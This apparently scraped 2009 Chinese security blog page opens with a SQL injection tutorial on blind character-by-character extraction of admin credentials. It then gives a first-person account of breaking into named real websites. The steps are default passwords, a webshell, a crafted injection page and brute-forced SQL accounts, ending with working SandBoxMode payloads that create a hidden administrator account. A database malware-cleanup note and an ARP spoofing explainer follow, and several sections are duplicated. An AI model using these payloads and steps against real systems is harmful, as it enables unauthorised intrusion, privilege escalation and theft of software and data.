有人会说:这里有一些偶然的成分,如果表名起得很复杂没规律的,那根本就没得玩下去了。说得很对,这世界根本就不存在100%成功的黑客技术,苍蝇不叮无缝的蛋,无论多技术多高深的黑客,都是因为别人的程序写得不严密或使用者保密意识不够,才有得下手。
最后,在表名和列名猜解成功后,再使用SQL语句,得出字段的值,下面介绍一种最常用的方法-Ascii逐字解码法,虽然这种方法速度很慢,但肯定是可行的方法。
我们举个例子,已知表Admin中存在username字段,首先,我们取第一条记录,测试长度:
http://www.19cn.com/showdetail.asp?id=49 ;;and (select top 1 len(username) from Admin)>0
先说明原理:如果top 1的username长度大于0,则条件成立;接着就是>1、>2、>3这样测试下去,一直到条件不成立为止,比如>7成立,>8不成立,就是len(username)=8
当然没人会笨得从0,1,2,3一个个测试,怎么样才比较快就看各自发挥了。在得到username的长度后,用mid(username,N,1)截取第N位字符,再asc(mid(username,N,1))得到ASCII码,比如:
id=49 and (select top 1 asc(mid(username,1,1)) from Admin)>0
同样也是用逐步缩小范围的方法得到第1位字符的ASCII码,注意的是英文和数字的ASCII码在1-128之间,可以用折半法加速猜解,如果写成程序测试,效率会有极大的提高。
第二节、SQL注入常用函数
有SQL语言基础的人,在SQL注入的时候成功率比不熟悉的人高很多。我们有必要提高一下自己的SQL水平,特别是一些常用的函数及命令。
Access:asc(字符) SQLServer:unicode(字符)
作用:返回某字符的ASCII码
Access:chr(数字) SQLServer:nchar(数字)
作用:与asc相反,根据ASCII码返回字符
Access:mid(字符串,N,L) SQLServer:substring(字符串,N,L)
作用:返回字符串从N个字符起长度为L的子字符串,即N到N+L之间的字符串
Access:abc(数字) SQLServer:abc (数字)
作用:返回数字的绝对值(在猜解汉字的时候会用到)
Access:A between B And C SQLServer:A between B And C
作用:判断A是否界于B与C之间
第三节、中文处理方法
在注入中碰到中文字符是常有的事,有些人一碰到中文字符就想打退堂鼓了。其实只要对中文的编码有所了解,“中文恐惧症”很快可以克服。
先说一点常识:
Access中,中文的ASCII码可能会出现负数,取出该负数后用abs()取绝对值,汉字字符不变。
SQLServer中,中文的ASCII为正数,但由于是UNICODE的双位编码,不能用函数ascii()取得ASCII码,必须用函数unicode ()返回unicode值,再用nchar函数取得对应的中文字符。
了解了上面的两点后,是不是觉得中文猜解其实也跟英文差不多呢?除了使用的函数要注意、猜解范围大一点外,方法是没什么两样的。
...
首先,判断环境,寻找注入点,判断数据库类型,这在入门篇已经讲过了。
其次,根据注入参数类型,在脑海中重构SQL语句的原貌,按参数类型主要分为下面三种:
(A) ID=49 这类注入的参数是数字型,SQL语句原貌大致如下:
Select * from 表名 where 字段=49
注入的参数为ID=49 And [查询条件],即是生成语句:
Select * from 表名 where 字段=49 And [查询条件]
(B) Class=连续剧 这类注入的参数是字符型,SQL语句原貌大致概如下:
Select * from 表名 where 字段=’连续剧’
注入的参数为Class=连续剧’ and [查询条件] and ‘’=’ ,即是生成语句:
Select * from 表名 where 字段=’连续剧’ and [查询条件] and ‘’=’’
(C) 搜索时没过滤参数的,如keyword=关键字,SQL语句原貌大致如下:
Select * from 表名 where 字段like ’%关键字%’
注入的参数为keyword=’ and [查询条件] and ‘%25’=’, 即是生成语句:
Select * from 表名 where字段like ’%’ and [查询条件] and ‘%’=’%’
接着,将查询条件替换成SQL语句,猜解表名,例如:
ID=49 And (Select Count(*) from Admin)>=0
如果页面就与ID=49的相同,说明附加条件成立,即表Admin存在,反之,即不存在(请牢记这种方法)。如此循环,直至猜到表名为止。
表名猜出来后,将Count(*)替换成Count(字段名),用同样的原理猜解字段名。
有人会说:这里有一些偶然的成分,如果表名起得很复杂没规律的,那根本就没得玩下去了。说得很对,这世界根本就不存在100%成功的黑客技术,苍蝇不叮无缝的蛋,无论多技术多高深的黑客,都是因为别人的程序写得不严密或使用者保密意识不够,才有得下手。
最后,在表名和列名猜解成功后,再使用SQL语句,得出字段的值,下面介绍一种最常用的方法-Ascii逐字解码法,虽然这种方法速度很慢,但肯定是可行的方法。
我们举个例子,已知表Admin中存在username字段,首先,我们取第一条记录,测试长度:
http://www.19cn.com/showdetail.asp?id=49 ;;and (select top 1 len(username) from Admin)>0
先说明原理:如果top 1的username长度大于0,则条件成立;接着就是>1、>2、>3这样测试下去,一直到条件不成立为止,比如>7成立,>8不成立,就是len(username)=8
当然没人会笨得从0,1,2,3一个个测试,怎么样才比较快就看各自发挥了。在得到username的长度后,用mid(username,N,1)截取第N位字符,再asc(mid(username,N,1))得到ASCII码,比如:
id=49 and (select top 1 asc(mid(username,1,1)) from Admin)>0
同样也是用逐步缩小范围的方法得到第1位字符的ASCII码,注意的是英文和数字的ASCII码在1-128之间,可以用折半法加速猜解,如果写成程序测试,效率会有极大的提高。
第二节、SQL注入常用函数
有SQL语言基础的人,在SQL注入的时候成功率比不熟悉的人高很多。我们有必要提高一下自己的SQL水平,特别是一些常用的函数及命令。
Access:asc(字符) SQLServer:unicode(字符)
作用:返回某字符的ASCII码
Access:chr(数字) SQLServer:nchar(数字)
作用:与asc相反,根据ASCII码返回字符
Access:mid(字符串,N,L) SQLServer:substring(字符串,N,L)
作用:返回字符串从N个字符起长度为L的子字符串,即N到N+L之间的字符串
Access:abc(数字) SQLServer:abc (数字)
作用:返回数字的绝对值(在猜解汉字的时候会用到)
Access:A between B And C SQLServer:A between B And C
作用:判断A是否界于B与C之间
第三节、中文处理方法
在注入中碰到中文字符是常有的事,有些人一碰到中文字符就想打退堂鼓了。其实只要对中文的编码有所了解,“中文恐惧症”很快可以克服。
先说一点常识:
Access中,中文的ASCII码可能会出现负数,取出该负数后用abs()取绝对值,汉字字符不变。
SQLServer中,中文的ASCII为正数,但由于是UNICODE的双位编码,不能用函数ascii()取得ASCII码,必须用函数unicode ()返回unicode值,再用nchar函数取得对应的中文字符。
了解了上面的两点后,是不是觉得中文猜解其实也跟英文差不多呢?除了使用的函数要注意、猜解范围大一点外,方法是没什么两样的。
...
24 2009-12
分类:技术文章 | 评论:0 | 浏览:
作者:aloner
来源:http://www.aloner.cn/
题外话:
最近想做几个垃圾站玩玩。可手上又没有啥好程序。郁闷。
那些网上免费的程序又没多少好玩意。
百度看看网上谁卖程序。方便的话,搞几个下来玩玩好了。
一:小碰头:
百度上找了一会, http://www.200ym.cn/
看到这个站上有几个我喜欢的程序。
咋办?试试看吧。
当时一看这站,哪像个出售源码程序的站。这么丑。用的啥系统我想大家不说我说也知道了吧。
当然,人家手上既然有这么多源码,想必也是通过自己的入侵手段搞来的。
那他的主站也基本上就不需要看了。
随便在一个url上添加个单引号出现了这个。加了防注入了.
算了。不错主站入手了。
拿出我们最喜欢的东西吧。
seologs.com/ip-domains.html" target="_blank" rel="external">http://www.seologs.com/ip-domains.html (http://www.114best.com/ip)
查到同一服务器上有这些站。
有53个站。心里开心了。旁注有望啊。
从主站也得知这些网站都是网站管理员的出售中的程序。
所以给他们分配的也都是2级域名。大家会想了。2级域名?会不会如果直接搞定一个webshell,就可以得到所有程序呢?因为他们这些演示站点或许会是在主站的下级目录吧。
当初我也这么想的。先不说这个了。
下面我们开始吧。
我首先瞄准了http://lianyun.200ym.cn/
大家看到了什么?
对,论坛。而且是动网7.1的。
不是吧?这么简单就可以搞到一个webshell了?还卖源码呢.唉。
动网默认的密码就进去了。
咱们登陆后台拿webshell吧。
Dvbbs7.1首先考虑后台导出模板然后备份拿webshell.
然后就导出了。问题也就来了。
去看看备份数据库那里能否备份。是可以备份的。
导出模板不可以。上传文件总还是会允许的吧?
结果无论我上传什么类型的文件。无论我怎么伪造文件。都显示这个。难怪管理员会这么放
心的把密码设为默认的。我想大概是方便购买的人查看吧。
想了想。要是这样的话?
那不会所有的2级网站都是这样吧?
我是个不服输的人。大不了一个一个试。不就53个网站么?
经历了“无数”的数据库只读,无写入权限等问题。几乎所有的2级都是这样。看来管理员还是挺有意识。尴尬了。怎么办?不会就这么放弃吧。
二:峰回路转。
我没有放弃。接着又找到一动网7.1默认密码。
http://haoteacher.200ym.cn/BBS/
哈哈。百密终有一疏啊。
这么多的站。总算还有一个没把权限给卡住啊。
成功导出后。然后通过备份拿到一个webshell.
终于叹了口气。搞了大半天终于拿到了一个webshell..
提权吧。
无ws
无任何第3方可以直接利用软件。
……Aspx的马马运行不了(其实服务器是支持.net的)。
跳转的d:/web/ 跳转不了……
唉。提权无望啊。
又不知道其他目录的名称。社工了好几个,都不能跳转。
想了想,同级目录会不会允许跳转呢?带着侥幸的心理尝试了下。
大家会说了,根本就不知道其他的网站目录
其实要想知道一个同级目录也不难。刚刚咱们不是还有个动网默认密码的没搞下来么?
大家有没想到什么?动网后台在数据处理的系统信息检测可以看到网站的路径的。呵呵。对了。(其实还有的其他几个站点可以通过aspcheck.asp来得知的。)
哈哈。跳转成功。但也就只能跳这个三级目录。不过不要紧。
舒服的东西在下面呢。
习惯性的看了下数据库连接文件。
strconn = "driver={sql server};server=(local);uid=xxx;pwd=xxx;database=xxx"
呵呵。是个SQL的数据库。
试试是否可以上传文件到这个站。
唉。权限还是不够啊。
那就用SQLtool直接连接吧。我晕。
怎么可能呢?密码难道错误?不会啊。重新找了一下数据库连接我文件。也就那么一个。那到
底怎么回事呢?
很明显,禁止了外部连接1433端口。如果是这样的话那好办。
传个SQLrootkit就可以了。
事实证明了这一点。我用webshell自带的SQL连接工具连接了。
在我意料之中。这仅仅是个db权限的数据库而已。
不过db权限的数据库也暂时够我们用了。
Db权限的数据库?大家想到了什么?呵呵。对了。
Db 权限的注入点可以列目录啊。既然服务器允许我们跳转到3级目录(这只是暂时的猜想,
因为毕竟暂时只有一个3级目录被我们跳转了)。
XP_CMDSHELL............. 存在!
SP_OACreate............. 存在!
XP_REGWRITE............. 存在!
XP_SERVICECONTROL 存在!
经查询。这些都还在。那就好办了。
直接构造注入点吧。
!--#include file="xx.asp"-->
%
set rs=server.createobject("ADODB.recordset")
id = request("id")
strSQL = "select * from admin where id=" & id
rs.open strSQL,conn,1,3
rs.close
%>
这里的admin必须是一个存在的表名。
我们可以通过SQL连接工具执行SQL命令查询。
select name from sysobjects where type='U'
查询出我们需要的表名。或者我也在 ../ conn/encode.asp
这个文件里找到这一句。sql="select count (*) from login where id="&cint(myid)
很明显。这里的login就可以被我们用上。
strSQL = "select * from login where id=" & id 我们构造出这样的语句替换到上面的代码中。
至此。终于有了突破。成功构造了注入点。
呵呵。能够列出目录了。
我们现在会想。要想搞到3389的终极权限。现在只能靠1433这个口子了。
既然服务器支持我们跳转到某些目录。那咱们一一试过去不就行了。
事情证明。找1433实在是太辛苦了。有的人大概会一个目录一个目录的去找吧。但有的网站只是access的。
其实这也是我当初的做法。后来兄弟可酷可乐告诉我。直接列出这个目录d:\Program Files\Microsoft SQL Server\MSSQL\Data\
数据库的前缀基本上是有规律的。那就是跟二级域名很相似。直接去找那些目录就可以了。这样就可以省下很多事。
找到目录后,一一的在webshell上跳转。很顺利。在通过几次观察后。
管理员把SQL帐户设置的很有规律。
aaa1 aaa2 aaa3 aaa4 aaa5 ……
而密码有都是一样的。我这个人就是懒,喜欢偷懒。那这些用户中会否有一个是SA的权限呢?赶紧去一个一个试。我从aaa1试到aaa16。
呵呵。
恭喜!SQL SERVER最高权限。
还等什么?赶紧”net user” 吧。
xpsql.cpp: 错误 5 来自 CreateProcess(第 737 行)
郁闷了。出现了这样的情况。
没有足够的权限创建进程。
难道不是SA权限? SA都被降权了?
c:\windows\system32\cmd.exe没有被删啊
那怎么办?
想要用SQL查询分析器连接吧, 但1433又不对外开放。外部不可以连接。
想把服务器上的1433端口转发到本地吧。又无ws.
网上查了查资料。
用沙盒模式提权来试下
再来构造个个SA的注入点。
这不难。继续构造。再次执行select name from sysobjects where type='U'查询myadmin这个数据库中的表名。
好了。成功构造出来了。接着就是沙盒模式提权了。
http://haoteacher.200ym.cn/Manage/Include/sql.asp?id=1;EXEC%20master.dbo.xp_regwrite%20'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;--
http://haoteacher.200ym.cn/Manage/Include/sql.asp?id=1;Select*From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user aloner$ aloner /add")');--
http://haoteacher.200ym.cn/Manage/Include/sql.asp?id=1;Select*From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net localgroup administrators aloner$ /add")');--
返回正常。说明成功了。
或者用HDSI 执行下面这些SQL命令。
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user aloner aloner /add")');
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net localgroup administrators aloner /add")');
至此,总算搞到system权限。顺便搞了几个程序。
总结一下:
这次入侵没什么技术性。
咱们渗透一个站点的时候,最重要的是不断的尝试+思路。
这次渗透主要还是大胆的实验和假设加上管理员的疏忽吧。演示站点的权限没有设置好。
...
来源:http://www.aloner.cn/
题外话:
最近想做几个垃圾站玩玩。可手上又没有啥好程序。郁闷。
那些网上免费的程序又没多少好玩意。
百度看看网上谁卖程序。方便的话,搞几个下来玩玩好了。
一:小碰头:
百度上找了一会, http://www.200ym.cn/
看到这个站上有几个我喜欢的程序。
咋办?试试看吧。
当时一看这站,哪像个出售源码程序的站。这么丑。用的啥系统我想大家不说我说也知道了吧。
当然,人家手上既然有这么多源码,想必也是通过自己的入侵手段搞来的。
那他的主站也基本上就不需要看了。
随便在一个url上添加个单引号出现了这个。加了防注入了.
算了。不错主站入手了。
拿出我们最喜欢的东西吧。
seologs.com/ip-domains.html" target="_blank" rel="external">http://www.seologs.com/ip-domains.html (http://www.114best.com/ip)
查到同一服务器上有这些站。
有53个站。心里开心了。旁注有望啊。
从主站也得知这些网站都是网站管理员的出售中的程序。
所以给他们分配的也都是2级域名。大家会想了。2级域名?会不会如果直接搞定一个webshell,就可以得到所有程序呢?因为他们这些演示站点或许会是在主站的下级目录吧。
当初我也这么想的。先不说这个了。
下面我们开始吧。
我首先瞄准了http://lianyun.200ym.cn/
大家看到了什么?
对,论坛。而且是动网7.1的。
不是吧?这么简单就可以搞到一个webshell了?还卖源码呢.唉。
动网默认的密码就进去了。
咱们登陆后台拿webshell吧。
Dvbbs7.1首先考虑后台导出模板然后备份拿webshell.
然后就导出了。问题也就来了。
去看看备份数据库那里能否备份。是可以备份的。
导出模板不可以。上传文件总还是会允许的吧?
结果无论我上传什么类型的文件。无论我怎么伪造文件。都显示这个。难怪管理员会这么放
心的把密码设为默认的。我想大概是方便购买的人查看吧。
想了想。要是这样的话?
那不会所有的2级网站都是这样吧?
我是个不服输的人。大不了一个一个试。不就53个网站么?
经历了“无数”的数据库只读,无写入权限等问题。几乎所有的2级都是这样。看来管理员还是挺有意识。尴尬了。怎么办?不会就这么放弃吧。
二:峰回路转。
我没有放弃。接着又找到一动网7.1默认密码。
http://haoteacher.200ym.cn/BBS/
哈哈。百密终有一疏啊。
这么多的站。总算还有一个没把权限给卡住啊。
成功导出后。然后通过备份拿到一个webshell.
终于叹了口气。搞了大半天终于拿到了一个webshell..
提权吧。
无ws
无任何第3方可以直接利用软件。
……Aspx的马马运行不了(其实服务器是支持.net的)。
跳转的d:/web/ 跳转不了……
唉。提权无望啊。
又不知道其他目录的名称。社工了好几个,都不能跳转。
想了想,同级目录会不会允许跳转呢?带着侥幸的心理尝试了下。
大家会说了,根本就不知道其他的网站目录
其实要想知道一个同级目录也不难。刚刚咱们不是还有个动网默认密码的没搞下来么?
大家有没想到什么?动网后台在数据处理的系统信息检测可以看到网站的路径的。呵呵。对了。(其实还有的其他几个站点可以通过aspcheck.asp来得知的。)
哈哈。跳转成功。但也就只能跳这个三级目录。不过不要紧。
舒服的东西在下面呢。
习惯性的看了下数据库连接文件。
strconn = "driver={sql server};server=(local);uid=xxx;pwd=xxx;database=xxx"
呵呵。是个SQL的数据库。
试试是否可以上传文件到这个站。
唉。权限还是不够啊。
那就用SQLtool直接连接吧。我晕。
怎么可能呢?密码难道错误?不会啊。重新找了一下数据库连接我文件。也就那么一个。那到
底怎么回事呢?
很明显,禁止了外部连接1433端口。如果是这样的话那好办。
传个SQLrootkit就可以了。
事实证明了这一点。我用webshell自带的SQL连接工具连接了。
在我意料之中。这仅仅是个db权限的数据库而已。
不过db权限的数据库也暂时够我们用了。
Db权限的数据库?大家想到了什么?呵呵。对了。
Db 权限的注入点可以列目录啊。既然服务器允许我们跳转到3级目录(这只是暂时的猜想,
因为毕竟暂时只有一个3级目录被我们跳转了)。
XP_CMDSHELL............. 存在!
SP_OACreate............. 存在!
XP_REGWRITE............. 存在!
XP_SERVICECONTROL 存在!
经查询。这些都还在。那就好办了。
直接构造注入点吧。
!--#include file="xx.asp"-->
%
set rs=server.createobject("ADODB.recordset")
id = request("id")
strSQL = "select * from admin where id=" & id
rs.open strSQL,conn,1,3
rs.close
%>
这里的admin必须是一个存在的表名。
我们可以通过SQL连接工具执行SQL命令查询。
select name from sysobjects where type='U'
查询出我们需要的表名。或者我也在 ../ conn/encode.asp
这个文件里找到这一句。sql="select count (*) from login where id="&cint(myid)
很明显。这里的login就可以被我们用上。
strSQL = "select * from login where id=" & id 我们构造出这样的语句替换到上面的代码中。
至此。终于有了突破。成功构造了注入点。
呵呵。能够列出目录了。
我们现在会想。要想搞到3389的终极权限。现在只能靠1433这个口子了。
既然服务器支持我们跳转到某些目录。那咱们一一试过去不就行了。
事情证明。找1433实在是太辛苦了。有的人大概会一个目录一个目录的去找吧。但有的网站只是access的。
其实这也是我当初的做法。后来兄弟可酷可乐告诉我。直接列出这个目录d:\Program Files\Microsoft SQL Server\MSSQL\Data\
数据库的前缀基本上是有规律的。那就是跟二级域名很相似。直接去找那些目录就可以了。这样就可以省下很多事。
找到目录后,一一的在webshell上跳转。很顺利。在通过几次观察后。
管理员把SQL帐户设置的很有规律。
aaa1 aaa2 aaa3 aaa4 aaa5 ……
而密码有都是一样的。我这个人就是懒,喜欢偷懒。那这些用户中会否有一个是SA的权限呢?赶紧去一个一个试。我从aaa1试到aaa16。
呵呵。
恭喜!SQL SERVER最高权限。
还等什么?赶紧”net user” 吧。
xpsql.cpp: 错误 5 来自 CreateProcess(第 737 行)
郁闷了。出现了这样的情况。
没有足够的权限创建进程。
难道不是SA权限? SA都被降权了?
c:\windows\system32\cmd.exe没有被删啊
那怎么办?
想要用SQL查询分析器连接吧, 但1433又不对外开放。外部不可以连接。
想把服务器上的1433端口转发到本地吧。又无ws.
网上查了查资料。
用沙盒模式提权来试下
再来构造个个SA的注入点。
这不难。继续构造。再次执行select name from sysobjects where type='U'查询myadmin这个数据库中的表名。
好了。成功构造出来了。接着就是沙盒模式提权了。
http://haoteacher.200ym.cn/Manage/Include/sql.asp?id=1;EXEC%20master.dbo.xp_regwrite%20'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;--
http://haoteacher.200ym.cn/Manage/Include/sql.asp?id=1;Select*From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user aloner$ aloner /add")');--
http://haoteacher.200ym.cn/Manage/Include/sql.asp?id=1;Select*From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net localgroup administrators aloner$ /add")');--
返回正常。说明成功了。
或者用HDSI 执行下面这些SQL命令。
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user aloner aloner /add")');
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net localgroup administrators aloner /add")');
至此,总算搞到system权限。顺便搞了几个程序。
总结一下:
这次入侵没什么技术性。
咱们渗透一个站点的时候,最重要的是不断的尝试+思路。
这次渗透主要还是大胆的实验和假设加上管理员的疏忽吧。演示站点的权限没有设置好。
...
24 2009-12
分类:技术文章 | 评论:0 | 浏览:
转载于:编程汉的博客
今天接到田总的求助电话,火速赶回寝室上服务器查看情况,原来是一个网站被入侵了,破坏相当严重,sql数据库被挂马,所有的表里面大部分字段都被多次重复插入挂马代码,查看日志,还好没有涉及到服务器的安全,只是数据库那里出现了很多异常警告而已,网站确实存在漏洞
没有办法,我只得修复数据库,因为他们没有数据库备份,根本就没有办法还原数据库啊,何况连事务日志都没有开启,试着恢复了几次都不成功,恢复数据库没有一点希望,我只得乖乖的帮他们清理挂马代码,不可能手工删除挂马代码,毕竟数据太大了,不可能去直接修改,通过四处搜寻得到了一个勉强有效的解决办法,每个表里面去执行一下这个sql语句
update tablename set @ziduanming =replace(cast(@ziduanming as varchar(8000)),'<script src=http://www.11910.net/1.js></script>',null)
上面的sql语句可以对应修改表,字段名,和替换内容
其实,sql数据库挂马是一种较新的挂马方法,只要网站存在注入,并且连接数据库是db owner权限就可以进行数据库挂马,估计这次攻击的流程应该是自动化的,通过先进的扫描技术批量收集到几万网站的SQL注入漏洞,针对漏洞攻击,进行自动化的SQL注入挂马。这次应该有很多网站遭殃了,asp+mssql的是主要被攻击对象!
本人给出解决方案
sql数据库挂马的解决办法:
正确清理木马,注意数据库不能随便修改或删除,被挂上马后,更需要谨慎的操作。建议,先备份然后再小心清理。
如果以前没有备份的话,就利用我上面的sql命令进行修复,
如何预防sql数据库挂马:
1、清理网站上所有注入点。
2、为网站配置可靠的防注入程序。
3、最好在网站源码中做好过滤,在数据库中限制字符的类型和长度。
4、养成经常备份数据库的习惯。大家可能无法保证天天备份数据库,但也会保证每周备份一次,如果有时间保证天天备份数据库。
5、最好是请专业的网站安全公司,对您的站和服务器做彻底的安全评估。
...
今天接到田总的求助电话,火速赶回寝室上服务器查看情况,原来是一个网站被入侵了,破坏相当严重,sql数据库被挂马,所有的表里面大部分字段都被多次重复插入挂马代码,查看日志,还好没有涉及到服务器的安全,只是数据库那里出现了很多异常警告而已,网站确实存在漏洞
没有办法,我只得修复数据库,因为他们没有数据库备份,根本就没有办法还原数据库啊,何况连事务日志都没有开启,试着恢复了几次都不成功,恢复数据库没有一点希望,我只得乖乖的帮他们清理挂马代码,不可能手工删除挂马代码,毕竟数据太大了,不可能去直接修改,通过四处搜寻得到了一个勉强有效的解决办法,每个表里面去执行一下这个sql语句
update tablename set @ziduanming =replace(cast(@ziduanming as varchar(8000)),'<script src=http://www.11910.net/1.js></script>',null)
上面的sql语句可以对应修改表,字段名,和替换内容
其实,sql数据库挂马是一种较新的挂马方法,只要网站存在注入,并且连接数据库是db owner权限就可以进行数据库挂马,估计这次攻击的流程应该是自动化的,通过先进的扫描技术批量收集到几万网站的SQL注入漏洞,针对漏洞攻击,进行自动化的SQL注入挂马。这次应该有很多网站遭殃了,asp+mssql的是主要被攻击对象!
本人给出解决方案
sql数据库挂马的解决办法:
正确清理木马,注意数据库不能随便修改或删除,被挂上马后,更需要谨慎的操作。建议,先备份然后再小心清理。
如果以前没有备份的话,就利用我上面的sql命令进行修复,
如何预防sql数据库挂马:
1、清理网站上所有注入点。
2、为网站配置可靠的防注入程序。
3、最好在网站源码中做好过滤,在数据库中限制字符的类型和长度。
4、养成经常备份数据库的习惯。大家可能无法保证天天备份数据库,但也会保证每周备份一次,如果有时间保证天天备份数据库。
5、最好是请专业的网站安全公司,对您的站和服务器做彻底的安全评估。
...
24 2009-12
分类:技术文章 | 评论:0 | 浏览:
一、ARP概念
咱们谈ARP之前,还是先要知道ARP的概念和工作原理,理解了原理知识,才能更好去面对和分析处理问题。
1.1ARP概念知识
ARP,全称Address Resolution Protocol,中文名为地址解析协议,它工作在数据链路层,在本层和硬件接口联系,同时对上层提供服务。
IP数据包常通过以太网发送,以太网设备并不识别32位IP地址,它们是以48位以太网地址传输以太网数据包。因此,必须把IP目的地址转换成以太网目的地址。在以太网中,一个主机要和另一个主机进行直接通信,必须要知道目标主机的MAC地址。但这个目标MAC地址是如何获得的呢?它就是通过地址解析协议获得的。ARP协议用于将网络中的IP地址解析为的硬件地址(MAC地址),以保证通信的顺利进行。
1.2ARP工作原理
首先,每台主机都会在自己的ARP缓冲区中建立一个 ARP列表,以表示IP地址和MAC地址的对应关系。当源主机需要将一个数据包要发送到目的主机时,会首先检查自己 ARP列表中是否存在该 IP地址对应的MAC地址,如果有﹐就直接将数据包发送到这个MAC地址;如果没有,就向本地网段发起一个ARP请求的广播包,查询此目的主机对应的MAC地址。此ARP请求数据包里包括源主机的IP地址、硬件地址、以及目的主机的IP地址。网络中所有的主机收到这个ARP请求后,会检查数据包中的目的IP是否和自己的IP地址一致。如果不相同就忽略此数据包;如果相同,该主机首先将发送端的MAC地址和IP地址添加到自己的ARP列表中,如果ARP表中已经存在该IP的信息,则将其覆盖,然后给源主机发送一个 ARP响应数据包,告诉对方自己是它需要查找的MAC地址;源主机收到这个ARP响应数据包后,将得到的目的主机的IP地址和MAC地址添加到自己的ARP列表中,并利用此信息开始数据的传输。如果源主机一直没有收到ARP响应数据包,表示ARP查询失败。
例如:
A的地址为:IP:192.168.10.1 MAC: AA-AA-AA-AA-AA-AA
B的地址为:IP:192.168.10.2 MAC: BB-BB-BB-BB-BB-BB
根据上面的所讲的原理,我们简单说明这个过程:A要和B通讯,A就需要知道B的以太网地址,于是A发送一个ARP请求广播(谁是192.168.10.2 ,请告诉192.168.10.1),当B收到该广播,就检查自己,结果发现和自己的一致,然后就向A发送一个ARP单播应答(192.168.10.2 在BB-BB-BB-BB-BB-BB)。
1.3ARP通讯模式
通讯模式(Pattern Analysis):在网络分析中,通讯模式的分析是很重要的,不同的协议和不同的应用都会有不同的通讯模式。更有些时候,相同的协议在不同的企业应用中也会出现不同的通讯模式。ARP在正常情况下的通讯模式应该是:请求 -> 应答 -> 请求 -> 应答,也就是应该一问一答。
二、常见ARP攻击类型
个人认为常见的ARP攻击为两种类型:ARP扫描和ARP欺骗。
2.1ARP扫描(ARP请求风暴)
通讯模式(可能):
请求 -> 请求 -> 请求 -> 请求 -> 请求 -> 请求 -> 应答 -> 请求 -> 请求 -> 请求...
描述:
网络中出现大量ARP请求广播包,几乎都是对网段内的所有主机进行扫描。大量的ARP请求广播可能会占用网络带宽资源;ARP扫描一般为ARP攻击的前奏。
出现原因(可能):
病毒程序,侦听程序,扫描程序。
如果网络分析软件部署正确,可能是我们只镜像了交换机上的部分端口,所以大量ARP请求是来自与非镜像口连接的其它主机发出的。
如果部署不正确,这些ARP请求广播包是来自和交换机相连的其它主机。
2.2ARP欺骗
ARP协议并不只在发送了ARP请求才接收ARP应答。当计算机接收到ARP应答数据包的时候,就会对本地的ARP缓存进行更新,将应答中的IP和MAC地址存储在ARP缓存中。所以在网络中,有人发送一个自己伪造的ARP应答,网络可能就会出现问题。这可能就是协议设计者当初没考虑到的!
2.2.1欺骗原理
假设一个网络环境中,网内有三台主机,分别为主机A、B、C。主机详细信息如下描述:
A的地址为:IP:192.168.10.1 MAC: AA-AA-AA-AA-AA-AA
B的地址为:IP:192.168.10.2 MAC: BB-BB-BB-BB-BB-BB
C的地址为:IP:192.168.10.3 MAC: CC-CC-CC-CC-CC-CC
正常情况下A和C之间进行通讯,但是此时B向A发送一个自己伪造的ARP应答,而这个应答中的数据为发送方IP地址是192.168.10.3(C的IP地址),MAC地址是BB-BB-BB-BB-BB-BB(C的MAC地址本来应该是CC-CC-CC-CC-CC-CC,这里被伪造了)。当A接收到B伪造的ARP应答,就会更新本地的ARP缓存(A被欺骗了),这时B就伪装成C了。同时,B同样向C发送一个ARP应答,应答包中发送方IP地址四192.168.10.1(A的IP地址),MAC地址是BB-BB-BB-BB-BB-BB(A的MAC地址本来应该是AA-AA-AA-AA-AA-AA),当C收到B伪造的ARP应答,也会更新本地ARP缓存(C也被欺骗了),这时B就伪装成了A。这样主机A和C都被主机B欺骗,A和C之间通讯的数据都经过了B。主机B完全可以知道他们之间说的什么:)。这就是典型的ARP欺骗过程。
注意:一般情况下,ARP欺骗的某一方应该是网关。
2.2.2两种情况
ARP欺骗存在两种情况:一种是欺骗主机作为“中间人”,被欺骗主机的数据都经过它中转一次,这样欺骗主机可以窃取到被它欺骗的主机之间的通讯数据;另一种让被欺骗主机直接断网。
◆第一种:窃取数据(嗅探)
通讯模式:
应答 -> 应答 -> 应答 -> 应答 -> 应答 -> 请求 -> 应答 -> 应答 ->请求->应答...
描述:
这种情况就属于我们上面所说的典型的ARP欺骗,欺骗主机向被欺骗主机发送大量伪造的ARP应答包进行欺骗,当通讯双方被欺骗成功后,自己作为了一个“中间人“的身份。此时被欺骗的主机双方还能正常通讯,只不过在通讯过程中被欺骗者“窃听”了。
出现原因(可能):
木马病毒
嗅探
人为欺骗
◆第二种:导致断网
通讯模式:
应答 -> 应答 -> 应答 -> 应答 -> 应答 -> 应答 -> 请求…
描述:
这类情况就是在ARP欺骗过程中,欺骗者只欺骗了其中一方,如B欺骗了A,但是同时B没有对C进行欺骗,这样A实质上是在和B通讯,所以A就不能和C通讯了,另外一种情况还可能就是欺骗者伪造一个不存在地址进行欺骗。
对于伪造地址进行的欺骗,在排查上比较有难度,这里最好是借用TAP设备(呵呵,这个东东好像有点贵勒),分别捕获单向数据流进行分析!
出现原因(可能):
木马病毒
人为破坏
一些网管软件的控制功能
三、常用的防护方法
搜索网上,目前对于ARP攻击防护问题出现最多是绑定IP和MAC和使用ARP防护软件,也出现了具有ARP防护功能的路由器。呵呵,我们来了解下这三种方法。
